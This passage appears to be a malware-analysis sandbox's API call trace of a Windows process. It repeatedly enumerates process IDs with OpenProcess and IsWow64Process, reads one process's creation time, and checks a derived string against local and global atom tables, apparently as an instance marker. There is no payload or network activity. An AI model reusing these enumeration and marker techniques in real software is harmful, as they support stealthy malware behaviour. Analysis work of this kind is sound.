	[0099.141] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.141] CloseHandle (hObject=0x36c) returned 1
	[0099.141] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0099.142] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0099.142] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x36c
	[0099.142] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.142] CloseHandle (hObject=0x36c) returned 1
	[0099.142] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0099.142] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x36c
	[0099.142] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.142] CloseHandle (hObject=0x36c) returned 1
	[0099.142] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x36c
	[0099.142] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.142] CloseHandle (hObject=0x36c) returned 1
	[0099.142] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x36c
	[0099.142] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.143] CloseHandle (hObject=0x36c) returned 1
	[0099.143] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x36c
	[0099.143] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.143] CloseHandle (hObject=0x36c) returned 1
	[0099.143] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x36c
	[0099.143] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.143] CloseHandle (hObject=0x36c) returned 1
	[0099.143] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x36c
	[0099.143] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.143] CloseHandle (hObject=0x36c) returned 1
	[0099.143] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0099.143] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x36c
	[0099.143] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.143] CloseHandle (hObject=0x36c) returned 1
	[0099.144] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x36c
	[0099.144] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.144] CloseHandle (hObject=0x36c) returned 1
	[0099.144] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x36c
	[0099.144] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.144] CloseHandle (hObject=0x36c) returned 1
	[0099.144] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x36c
	[0099.144] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.144] CloseHandle (hObject=0x36c) returned 1
	[0099.144] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x36c
	[0099.144] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.144] CloseHandle (hObject=0x36c) returned 1
	[0099.144] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x36c
	[0099.144] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.145] CloseHandle (hObject=0x36c) returned 1
	[0099.145] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x36c
	[0099.145] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.145] CloseHandle (hObject=0x36c) returned 1
	[0099.145] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x36c
	[0099.145] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.145] CloseHandle (hObject=0x36c) returned 1
	[0099.145] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x36c
	[0099.145] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.145] CloseHandle (hObject=0x36c) returned 1
	[0099.145] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x36c
	[0099.145] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.145] CloseHandle (hObject=0x36c) returned 1
	[0099.145] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x36c
	[0099.145] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.145] CloseHandle (hObject=0x36c) returned 1
	[0099.146] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x36c
	[0099.146] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.146] CloseHandle (hObject=0x36c) returned 1
	[0099.146] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x36c
	[0099.146] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.146] CloseHandle (hObject=0x36c) returned 1
	[0099.146] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x36c
	[0099.146] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.146] CloseHandle (hObject=0x36c) returned 1
	[0099.146] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x36c
	[0099.146] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.146] CloseHandle (hObject=0x36c) returned 1
	[0099.146] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x36c
	[0099.146] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.147] CloseHandle (hObject=0x36c) returned 1
	[0099.147] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x36c
	[0099.147] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.147] CloseHandle (hObject=0x36c) returned 1
	[0099.147] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x36c
	[0099.147] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.147] CloseHandle (hObject=0x36c) returned 1
	[0099.147] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x36c
	[0099.147] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.147] CloseHandle (hObject=0x36c) returned 1
	[0099.147] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x36c
	[0099.147] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.147] CloseHandle (hObject=0x36c) returned 1
	[0099.147] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x36c
	[0099.147] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.147] CloseHandle (hObject=0x36c) returned 1
	[0099.148] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x36c
	[0099.148] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.148] CloseHandle (hObject=0x36c) returned 1
	[0099.148] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x36c
	[0099.148] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.148] CloseHandle (hObject=0x36c) returned 1
	[0099.148] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x36c
	[0099.148] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0099.148] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0099.149] GetProcessTimes (in: hProcess=0x36c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0099.149] wsprintfA (in: param_1=0x677298, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0099.149] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0099.149] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0099.149] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0099.149] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0099.149] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0099.149] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0099.150] CloseHandle (hObject=0x36c) returned 1
	[0099.150] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0099.150] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0099.150] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x36c
	[0099.150] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.150] CloseHandle (hObject=0x36c) returned 1
	[0099.150] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x36c
	[0099.150] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.150] CloseHandle (hObject=0x36c) returned 1
	[0099.266] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0099.266] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0099.266] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0099.266] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0099.266] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0099.266] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0099.266] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0099.267] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0099.267] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0099.267] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0099.267] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0099.267] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0099.267] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0099.267] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0099.267] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0099.268] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0099.268] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0099.268] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0099.268] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x36c
	[0099.268] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.268] CloseHandle (hObject=0x36c) returned 1
	[0099.268] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0099.268] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0099.268] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x36c
	[0099.269] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.269] CloseHandle (hObject=0x36c) returned 1
	[0099.269] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0099.269] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x36c
	[0099.269] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.269] CloseHandle (hObject=0x36c) returned 1
	[0099.269] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x36c
	[0099.269] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.269] CloseHandle (hObject=0x36c) returned 1
	[0099.269] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x36c
	[0099.269] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.269] CloseHandle (hObject=0x36c) returned 1
	[0099.269] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x36c
	[0099.269] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.269] CloseHandle (hObject=0x36c) returned 1
	[0099.270] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x36c
	[0099.270] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.270] CloseHandle (hObject=0x36c) returned 1
	[0099.270] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x36c
	[0099.270] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.270] CloseHandle (hObject=0x36c) returned 1
	[0099.270] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0099.270] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x36c
	[0099.270] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.270] CloseHandle (hObject=0x36c) returned 1
	[0099.270] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x36c
	[0099.270] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.270] CloseHandle (hObject=0x36c) returned 1
	[0099.270] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x36c
	[0099.271] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.271] CloseHandle (hObject=0x36c) returned 1
	[0099.271] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x36c
	[0099.271] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.271] CloseHandle (hObject=0x36c) returned 1
	[0099.271] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x36c
	[0099.271] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.271] CloseHandle (hObject=0x36c) returned 1
	[0099.271] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x36c
	[0099.271] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.271] CloseHandle (hObject=0x36c) returned 1
	[0099.271] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x36c
	[0099.271] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.271] CloseHandle (hObject=0x36c) returned 1
	[0099.271] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x36c
	[0099.272] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.272] CloseHandle (hObject=0x36c) returned 1
	[0099.272] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x36c
	[0099.272] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.272] CloseHandle (hObject=0x36c) returned 1
	[0099.272] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x36c
	[0099.272] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.272] CloseHandle (hObject=0x36c) returned 1
	[0099.272] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x36c
	[0099.272] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.272] CloseHandle (hObject=0x36c) returned 1
	[0099.272] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x36c
	[0099.272] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.272] CloseHandle (hObject=0x36c) returned 1
	[0099.272] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x36c
	[0099.272] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.272] CloseHandle (hObject=0x36c) returned 1
	[0099.273] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x36c
	[0099.273] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.273] CloseHandle (hObject=0x36c) returned 1
	[0099.273] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x36c
	[0099.273] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.273] CloseHandle (hObject=0x36c) returned 1
	[0099.273] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x36c
	[0099.273] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.273] CloseHandle (hObject=0x36c) returned 1
	[0099.273] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x36c
	[0099.273] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.273] CloseHandle (hObject=0x36c) returned 1
	[0099.273] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x36c
	[0099.273] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.274] CloseHandle (hObject=0x36c) returned 1
	[0099.274] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x36c
	[0099.274] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.274] CloseHandle (hObject=0x36c) returned 1
	[0099.274] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x36c
	[0099.274] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.274] CloseHandle (hObject=0x36c) returned 1
	[0099.274] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x36c
	[0099.274] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.274] CloseHandle (hObject=0x36c) returned 1
	[0099.274] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x36c
	[0099.274] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.274] CloseHandle (hObject=0x36c) returned 1
	[0099.274] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x36c
	[0099.274] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.275] CloseHandle (hObject=0x36c) returned 1
	[0099.275] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x36c
	[0099.275] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0099.275] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0099.275] GetProcessTimes (in: hProcess=0x36c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0099.275] wsprintfA (in: param_1=0x677298, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0099.276] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0099.276] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0099.276] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0099.276] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0099.276] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0099.276] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0099.276] CloseHandle (hObject=0x36c) returned 1
	[0099.276] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0099.276] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0099.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x36c
	[0099.277] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.277] CloseHandle (hObject=0x36c) returned 1
	[0099.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x36c
	[0099.277] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.277] CloseHandle (hObject=0x36c) returned 1
	[0099.319] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0099.319] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0099.320] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0099.320] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0099.320] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0099.320] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0099.320] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0099.320] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0099.320] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0099.321] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0099.321] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0099.321] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0099.321] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0099.321] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0099.321] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0099.321] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0099.321] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0099.322] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0099.322] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x36c
	[0099.322] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.322] CloseHandle (hObject=0x36c) returned 1
	[0099.322] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0099.322] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0099.322] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x36c
	[0099.322] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.322] CloseHandle (hObject=0x36c) returned 1
	[0099.323] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0099.323] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x36c
	[0099.323] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.323] CloseHandle (hObject=0x36c) returned 1
	[0099.323] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x36c
	[0099.323] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.323] CloseHandle (hObject=0x36c) returned 1
	[0099.323] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x36c
	[0099.323] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.323] CloseHandle (hObject=0x36c) returned 1
	[0099.323] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x36c
	[0099.323] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.323] CloseHandle (hObject=0x36c) returned 1
	[0099.324] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x36c
